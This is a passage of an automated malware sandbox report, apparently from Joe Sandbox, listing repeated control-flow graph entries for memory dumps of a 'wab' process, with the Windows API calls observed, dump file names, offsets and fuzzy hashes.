                                                                          Control-flow Graph

                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2596233080.0000000024010000.00000040.00000800.00020000.00000000.sdmp, Offset: 24010000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_24010000_wab.jbxd

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32 ref: 02A771A6
                                                                          • GetCurrentThread.KERNEL32 ref: 02A771E3
                                                                          • GetCurrentProcess.KERNEL32 ref: 02A77220
                                                                          • GetCurrentThreadId.KERNEL32 ref: 02A77279
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2576021410.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_2a70000_wab.jbxd
                                                                          Similarity
                                                                          • API ID: Current$ProcessThread
                                                                          • String ID:
                                                                          • API String ID: 2063062207-0

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32 ref: 02A771A6
                                                                          • GetCurrentThread.KERNEL32 ref: 02A771E3
                                                                          • GetCurrentProcess.KERNEL32 ref: 02A77220
                                                                          • GetCurrentThreadId.KERNEL32 ref: 02A77279
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2576021410.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_2a70000_wab.jbxd
                                                                          Similarity
                                                                          • API ID: Current$ProcessThread
                                                                          • String ID:
                                                                          • API String ID: 2063062207-0

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 24012B62
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2596233080.0000000024010000.00000040.00000800.00020000.00000000.sdmp, Offset: 24010000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_24010000_wab.jbxd
                                                                          Similarity
                                                                          • API ID: CreateWindow
                                                                          • String ID:
                                                                          • API String ID: 716092398-0

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 24012B62
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2596233080.0000000024010000.00000040.00000800.00020000.00000000.sdmp, Offset: 24010000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_24010000_wab.jbxd
                                                                          Similarity
                                                                          • API ID: CreateWindow
                                                                          • String ID:
                                                                          • API String ID: 716092398-0

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 24015261
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2596233080.0000000024010000.00000040.00000800.00020000.00000000.sdmp, Offset: 24010000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_24010000_wab.jbxd
                                                                          Similarity
                                                                          • API ID: CallProcWindow
                                                                          • String ID:
                                                                          • API String ID: 2714655100-0

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02A773F7
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2576021410.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_2a70000_wab.jbxd
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02A773F7
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2576021410.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_2a70000_wab.jbxd
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 02A722EB
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2576021410.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_2a70000_wab.jbxd
                                                                          Similarity
                                                                          • API ID: HookWindows
                                                                          • String ID:
                                                                          • API String ID: 2559412058-0

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 02A722EB
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2576021410.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_2a70000_wab.jbxd
                                                                          Similarity
                                                                          • API ID: HookWindows
                                                                          • String ID:
                                                                          • API String ID: 2559412058-0

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • LoadLibraryExW.KERNEL32(00000000,?,?), ref: 24010D32
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2596233080.0000000024010000.00000040.00000800.00020000.00000000.sdmp, Offset: 24010000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_24010000_wab.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 24010AA6
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2596233080.0000000024010000.00000040.00000800.00020000.00000000.sdmp, Offset: 24010000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_24010000_wab.jbxd
                                                                          Similarity
                                                                          • API ID: HandleModule
                                                                          • String ID:
                                                                          • API String ID: 4139908857-0
                                                                          APIs
                                                                          • LoadLibraryExW.KERNEL32(00000000,?,?), ref: 24010D32
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2596233080.0000000024010000.00000040.00000800.00020000.00000000.sdmp, Offset: 24010000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_24010000_wab.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 24010AA6
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2596233080.0000000024010000.00000040.00000800.00020000.00000000.sdmp, Offset: 24010000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_24010000_wab.jbxd
                                                                          Similarity
                                                                          • API ID: HandleModule
                                                                          • String ID:
                                                                          • API String ID: 4139908857-0
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2575031903.0000000002A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A3D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_2a3d000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2575031903.0000000002A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A3D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_2a3d000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2575334475.0000000002A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A4D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_2a4d000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2575031903.0000000002A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A3D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_2a3d000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2575031903.0000000002A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A3D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_2a3d000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7b54652409675a8d3f7702fc1b278e370cc506f408a84c7dab7c1d503d06ad02
                                                                          • Instruction ID: b0e42293fcb7e35742be00dfa7117531cef745624ebecb6e132096161a718ce9
                                                                          • Opcode Fuzzy Hash: 7b54652409675a8d3f7702fc1b278e370cc506f408a84c7dab7c1d503d06ad02
                                                                          • Instruction Fuzzy Hash: B211E676504680DFCF16CF10D5C4B56BF72FB84324F24C5A9E8494B656C33AE456CBA2
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2575334475.0000000002A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A4D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_2a4d000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3f4675e99f22990077d7ca64c846758c7cedafdaf71502d2a3914074f32ea8d3
                                                                          • Instruction ID: 57bd871ca08977ac7c39b0b80da712075e2459352814c61715cac20a2bef0bad
                                                                          • Opcode Fuzzy Hash: 3f4675e99f22990077d7ca64c846758c7cedafdaf71502d2a3914074f32ea8d3
                                                                          • Instruction Fuzzy Hash: 7E11DD75504680CFDB05CF14D9C4B15BBA1FB88318F28C6AADC494B696C73AD44ACB62